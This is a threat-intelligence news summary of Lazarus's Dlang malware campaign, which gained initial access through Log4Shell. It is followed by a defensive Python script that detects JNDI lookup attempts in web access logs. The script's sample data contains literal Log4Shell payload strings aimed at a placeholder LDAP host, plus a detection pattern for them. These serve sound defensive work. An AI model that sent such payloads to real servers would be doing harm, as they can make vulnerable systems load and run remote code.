North Korean Hackers Developing Malware in Dlang Programming Language

December 11, 2023 at 10:12AM

Lazarus, a North Korea-linked hacking group, has been using malware written in the Dlang programming language in attacks on organizations in the manufacturing, agriculture, and physical security sectors. Cisco’s Talos security researchers attribute these attacks to Lazarus, which deployed the NineRAT, DLRAT, and BottomLoader malware families against unpatched systems. The attacks are tied to the Log4Shell vulnerability and involve the exploitation of internet-accessible VMware Horizon servers. Dlang has been attracting malware developers because of its versatility and easy learning curve.

Key takeaways are:

– Lazarus, a North Korea-linked hacking group, has been observed deploying Dlang malware in attacks against organizations in the manufacturing, agriculture, and physical security sectors.
– Dlang is an uncommon choice for malware development, but it is being used for its versatility and easy learning curve, which allow applications to be cross-compiled for multiple architectures.
– Three malware families built in Dlang, NineRAT, DLRAT, and BottomLoader, have been used by Lazarus in these attacks.
– Operation Blacksmith involved the deployment of NineRAT against a South American agricultural organization and a European manufacturing business. The attacks overlap with activity attributed to the North Korean group Onyx Sleet.
– NineRAT receives its commands over Telegram, establishes persistence, and can harvest system information, upload and download files, and uninstall itself.
– The BottomLoader downloader fetches and executes a payload from a hardcoded URL; newer versions also establish persistence.
– DLRAT functions as both a downloader and a backdoor, with commands for system reconnaissance.
– Lazarus exploited the Log4Shell vulnerability for initial access, followed by reconnaissance and deployment of the HazyLoad implant, alongside the use of credential-dumping utilities such as ProcDump and Mimikatz.
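The Log4Shell initial-access vector called out above leaves traces in ordinary web access logs, so it is something defenders can hunt for retroactively. The following Python script is an added example, not code from the Talos report or from this article: it parses constructed access-log lines from a hypothetical Horizon-style web portal and flags requests whose path, referer or User-Agent carries a Log4j JNDI lookup string, decoding percent-encoding first so encoded variants are not missed. All IP addresses, hostnames and paths in the sample are constructed placeholders.

```python
"""Flag Log4Shell-style JNDI lookup attempts in web access logs.

Added example; not from the Talos report or the article it summarizes.
Input is Combined Log Format (the common Apache/NGINX access-log layout).
The sample lines at the bottom are constructed for illustration.
"""
import re
from collections import Counter
from urllib.parse import unquote

# A Log4j lookup beginning with "jndi", case-insensitive, whitespace tolerated.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined Log Format: client, ident, user, [timestamp], "request", status,
# bytes, "referer", "user-agent". Only the named groups are used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def normalize(value, rounds=2):
    """Undo up to `rounds` layers of percent-encoding, stopping once stable.

    Attackers frequently URL-encode the lookup string; matching on the
    decoded form keeps the signature simple without missing those cases.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return (client_ip, field_name) if the line carries a JNDI lookup, else None."""
    match = LOG_RE.match(line)
    if not match:
        return None  # not a Combined Log Format line; skip rather than guess
    for field in ("req", "ref", "ua"):
        if JNDI_RE.search(normalize(match.group(field))):
            return match.group("ip"), field
    return None


def scan(lines):
    """Return all hits as (client_ip, field_name) tuples, in log order."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


def hits_by_ip(lines):
    """Count flagged requests per client IP, a quick triage view for responders."""
    return Counter(ip for ip, _field in scan(lines))


# Constructed sample log: one benign request, one lookup string in the
# User-Agent, and one percent-encoded lookup string in the query string.
SAMPLE_LOG = [
    '203.0.113.10 - - [11/Dec/2023:10:12:01 +0000] '
    '"GET /portal/webclient/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2023:10:12:05 +0000] '
    '"GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://jndi.example.invalid/x}"',
    '198.51.100.7 - - [11/Dec/2023:10:12:09 +0000] '
    '"GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2Fjndi.example.invalid%2Fx%7D HTTP/1.1" '
    '404 128 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, field in scan(SAMPLE_LOG):
        print(f"JNDI lookup from {ip} in {field}")
    print("per-client counts:", dict(hits_by_ip(SAMPLE_LOG)))
```

A literal `${jndi:` match is a first-pass triage signal, not a complete detector: Log4j's nested lookup syntax allows the string to be written in forms this pattern will not catch, so a clean scan is weak evidence of no exposure, and patching the affected Log4j versions remains the actual control. Feed the functions real access logs line by line; `hits_by_ip` gives responders the source addresses worth pivoting on first.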

These takeaways provide a clear understanding of the activities and techniques employed by Lazarus, as well as the specific malware families and vulnerabilities they have targeted.